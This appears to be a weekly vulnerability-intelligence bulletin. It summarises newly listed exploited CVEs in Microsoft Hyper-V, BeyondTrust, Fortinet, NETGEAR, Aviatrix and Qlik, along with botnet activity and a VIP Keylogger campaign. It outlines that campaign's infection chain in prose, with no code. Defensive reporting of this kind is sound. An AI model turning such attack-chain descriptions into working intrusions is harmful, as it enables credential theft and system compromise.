This week, seven critical vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency of patching critical flaws across various vendors. Microsoft led with three entries, followed by Qlik, BeyondTrust, Fortinet, and Aviatrix, each with one critical vulnerability. Compounding these threats, active exploitation was observed in NETGEAR routers, reinforcing the need for immediate security measures to safeguard vulnerable systems.  

The surge in botnet activity shows no signs of slowing down, with EnemyBot and Sysrv-K targeting the Spring Cloud Gateway, while the IoT Reaper botnet exploits a 12-year-old vulnerability in Cisco routers. Legacy threats like Mirai and Tsunami remain persistent, leveraging a nine-year-old flaw in the Eir D1000 Modem to compromise outdated infrastructure, proving that neglected systems remain an easy target for attackers.

Malware campaigns this week showcased both sophistication and persistence. The attack on the US Treasury, attributed to the Chinese state-sponsored group Silk Typhoon, highlights the increasing frequency of state-backed operations targeting government entities. A critical zero-day in Aviatrix was exploited to deploy XMRig cryptocurrency miners and the Sliver backdoor, demonstrating attackers’ focus on financial gain and long-term control. Meanwhile, the use of image-based code obfuscation to spread VIP Keylogger underscores the innovative tactics employed to evade detection and compromise systems.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-21333, CVE-2025-21334 and CVE-2025-21335

Elevation of Privilege Vulnerabilities in Windows Hyper-V NT Kernel Integration VSP have been addressed by Microsoft, which were exploited in attacks to gain SYSTEM-level access on Windows devices.  The Virtualization Service Provider (VSP), an essential component within the root partition of Hyper-V, facilitates synthetic device support to child partitions through the Virtual Machine Bus (VMBus), allowing these partitions to function as independent systems.  These vulnerabilities, which had been actively exploited in the wild as zero-days, were patched by Microsoft in their latest security update. With a high CVSS score of 7.8, these vulnerabilities have been added to the CISA KEV catalog, highlighting their critical nature. However, the specifics of their exploitation and the identities of the threat actors involved remain undisclosed.

‍CVE-2024-12686

An OS Command Injection Vulnerability in the BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) solutions, impacting versions 24.3.1 and earlier. This vulnerability allows attackers with existing administrative privileges to upload and execute malicious files, posing a significant security threat. This flaw has been added to the CISA KEV catalog, underscoring the urgency for organizations to implement immediate mitigation measures.

‍CVE-2024-55591

A critical Authentication Bypass Vulnerability in Fortinet FortiOS and FortiProxy, with a CVSS score of 9.8, enables remote attackers to escalate privileges and gain super-admin access to affected systems. Fortinet has confirmed that this vulnerability has been actively exploited as a zero-day, prompting its inclusion in the CISA KEV catalog.  Arctic Wolf Labs researchers have provided further insights into a campaign, initially detected in mid-November 2024, that is believed to exploit CVE-2024-55591. While Fortinet’s advisory does not attribute the discovery of CVE-2024-55591 to Arctic Wolf, there is a significant overlap between the indicators of compromise (IoCs) listed in Fortinet's advisory and those reported by Arctic Wolf Labs.

‍CVE-2024-12847

A critical Authentication Bypass Vulnerability, affecting NETGEAR Router models DGN1000 and DGN2200 v1, has been actively exploited since 2017. With a CVSS score of 9.8, this flaw allows attackers to bypass authentication mechanisms and execute commands with root privileges. This exploitation not only jeopardizes the security of the affected routers but also poses a significant threat to the broader network infrastructure, underscoring the urgent need for immediate remediation.

‍CVE-2024-50603

A critical Command Injection Vulnerability in the Aviatrix Network Controller, rated critical with a CVSS score of 10.0, allows remote attackers to execute arbitrary commands. This flaw impacts versions 7.x through 7.2.4820, is actively exploited in real-world attacks, and has been added to the CISA KEV catalog.  

CVE-2023-48365

A critical HTTP Tunneling Vulnerability in Qlik Sense Enterprise, rated 9.9 on the CVSS scale, allows attackers to escalate privileges and send unauthorized HTTP requests to the backend server hosting the software. This vulnerability affects versions prior to August 2023 Patch 2 and addresses an incomplete fix for CVE-2023-41265. Historically exploited by the Cactus Ransomware group, this flaw has been added to the CISA KEV catalog, highlighting the urgency of applying necessary patches

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2024-12686

A Command Injection Vulnerability was uncovered during BeyondTrust’s investigation into the compromise of select customer Remote Support (RS) SaaS instances, including one linked to the U.S. Department of Treasury. Alarmingly, this flaw may have been exploited as a zero-day, potentially allowing attackers to breach BeyondTrust systems and access its customers. The Treasury Department attack, disclosed on December 31, has been attributed to the Chinese state-sponsored Silk Typhoon group, highlighting the advanced tactics employed by nation-state actors to infiltrate critical organizations.  

CVE-2024-50603

Wiz Incident Response Team has identified that attackers are exploiting this vulnerability to deploy XMRig for cryptocurrency mining and the Sliver command-and-control (C2) framework. The use of XMRig allows threat actors to generate illicit profits, while the deployment of Sliver backdoor ensures persistent access to compromised systems for potential follow-up exploitation.

CVE-2017-11882

Threat actors have been embedding malicious code within images as part of sophisticated malware campaigns, including the deployment of VIP Keylogger. These attackers use a .NET loader to execute payloads hidden in images uploaded to the file-hosting website archive[.]org. The attack sequence begins with phishing emails disguised as invoices or purchase orders, luring victims into opening malicious attachments, such as Microsoft Excel files. These files exploit a known vulnerability in Equation Editor (CVE-2017-11882) to download a VBScript file. The VBScript then decodes and runs a PowerShell script to retrieve an image from archive[.]org, extract Base64-encoded data, and decode it into a .NET executable. This executable functions as a loader to download and run VIP Keylogger, enabling attackers to capture sensitive information, such as keystrokes, clipboard content, screenshots, and user credentials, from compromised systems.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/01/13/cisa-adds-two-known-exploited-vulnerabilities-catalog
2. https://www.cisa.gov/news-events/alerts/2025/01/14/cisa-adds-four-known-exploited-vulnerabilities-catalog
3. https://seclists.org/bugtraq/2013/Jun/8
4. https://www.beyondtrust.com/trust-center/security-advisories/bt24-11
5. https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603
6. https://threatresearch.ext.hp.com/wp-content/uploads/2025/01/HP_Wolf_Security_Threat_Insights_Report_January_2025.pdf
7. https://www.bloomberg.com/news/articles/2025-01-08/white-house-rushes-to-finish-cyber-order-after-china-hacks